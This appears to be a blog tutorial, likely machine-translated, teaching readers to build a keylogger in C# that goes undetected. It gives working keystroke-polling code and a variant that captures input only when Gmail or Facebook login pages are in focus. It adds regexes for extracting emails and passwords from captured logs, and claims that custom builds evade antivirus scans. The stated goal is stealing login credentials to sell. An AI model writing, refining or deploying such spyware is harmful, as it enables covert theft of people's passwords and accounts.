Step-by-step guide. Writing our zero-detect keylogger

Step-by-step guide. Writing our zero-detect keylogger

Kelogger is software or some physical device that can intercept and remember keystrokes on the compromised machine. It can be thought of as a numerical trap for every keystroke you make on a keyboard.

This feature is often embedded in other, more sophisticated software, such as Remote Access Trojans RATS, which ensure that the intercepted data is delivered back to the attacker. Hardware keyloggers also exist, but are less common because they require direct physical access to the machine.



However, creating basic keylogger functions is easy enough to program.
Next, this code will not be optimized, I will just show you the lines of code that can do the job, it is not the most elegant or optimal way. Finally, I won’t tell you how to make a keylogger resistant to reboots or try to make it absolutely painless, thanks to special programming techniques, as well as about protection against deletion, even if it is detected.
If you have sufficient knowledge, you will have more than enough information from this article. If you have something to learn – welcome to Hacker Place Academy.

Come on!

To connect to the keyboard you just need to use 2 lines in C#:

1.  [DllImport("user32.dll")]
2.  
3. public static extern int GetAsyncKeyState(Int32 i);

GetAsyncKeyState – this function determines whether the keys are pressed or depressed at the moment of the call and whether they were pressed after the previous call. Now we constantly call this function to get data from the keyboard:



1. while (true)
2.  {
3. Thread.Sleep(100);
4. for (Int32 i = 0; i < 255; i++)
5.  {
6. int state = GetAsyncKeyState(i);
7. if (state == 1 || state == -32767)
8.  {
9.  Console.WriteLine((Keys)i);
10. 
11. }
12. }
13. }

What’s going on here? This cycle will poll every 100 ms each key to determine its status. If one of them is pressed (or has been pressed), a message about it will be displayed on the console. In real life this data is buffered and sent to the hacker, i.e. us.

Smart keylogger

.
Wait, does it make sense to try to capture all the information from all the applications?

The code above pulls raw input from the keyboard from any window and input field where the focus is now. If your goal is credit card numbers and passwords, then this approach is not very effective. For real-world scenarios where these keyloggers are executed on hundreds or thousands of machines, the subsequent parsing of the data can take a very long time and eventually become meaningless, because the information valuable to the cracker may become outdated by then.

Let’s assume that I want to get my Facebook or Gmail credentials to sell likes later. Then a new idea is to activate your keylogging only when your browser window is active and you have the word Gmail or facebook in the title of the page. By using this method, I increase the chances of getting your login credentials.

Second version of the code:

1. while (true) 
2.  {
3. IntPtr handle = GetForegroundWindow();
4. if (GetWindowText(handle, buff, chars) > 0)
5.  {
6. string line = buff.ToString();
7. if (line.Contains("Gmail") || line.Contains("Facebook - Log In or Sign Up "))
8.  {
9. // keypad check 
10. }
11. }
12. Thread.Sleep(100);
13. }

This fragment will detect the active window every 100ms. It is done using the GetForegroundWindow function (more information on MSDN). The page header is stored in the buff variable, if it contains gmail or facebook, then a fragment of keyboard scan is called.

By doing this, we have only scanned the keyboard when a browser window is open on facebook and gmail sites.

A smarter keylogger

.
Let’s assume the hacker was able to get the data by code, like ours. Let’s also assume that he’s ambitious enough to infect tens or hundreds of thousands of cars. The result: a huge file with gigabytes of text, in which the necessary information still need to be found. It’s a good time to get acquainted with regular expressions or regex. It’s something like a mini language for making some templates and scanning text to match the specified templates. You can learn more here.

For simplicity, I will immediately bring you ready-made expressions that match your login names and passwords:

1. // Looking for a mail address
2.  ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$.
3.  
4.  
5. // Looking for password
6.  (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z]).

These expressions here as a hint of what can be done using them. With regular expressions you can search for (and find!) any structures that have a certain and invariant format, such as passport numbers, credit card numbers, accounts and even passwords.

Indeed, regular expressions are not the most readable kind of code, but they are one of the programmer’s best friends if there are text parsing tasks. The Java, C#, JavaScript, and other popular languages already have ready-made functions to which you can pass regular regular expressions.

For C#, this is what it looks like:

1. Regex re = new Regex(@"^[\w!#$%&amp;'*+\-/=?\^_`{|}~]+(\.[\w!#$%&amp;'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
2. Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");
3. string email = "Oded.awask@gmail.com."
4. string pass = "abcde3FG."
5.  Match result = re.Match(email);
6.  Match result2 = re2.Match(pass);

Where the first expression (re) will correspond to any email, and the second (re2) will correspond to any digit of an alphabetic construct greater than 6 characters.

Free and undetectable

In my example I used Visual Studio – you can use your favorite environment – to create such a keylogger in 30 minutes.

One question remains: will such software really be undetectable for antivirus programs?

I compiled my code and checked the exe file on the Virustotal website. It is a web tool that calculates the hash of the file that you downloaded and searches for it in a database of known viruses. Surprise! Naturally, nothing was found.

That’s the main thing! You can always change the code and evolve, being always a few steps ahead of threat scanners. If you are able to write your own code, it is almost guaranteed to be undetectable.


52 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: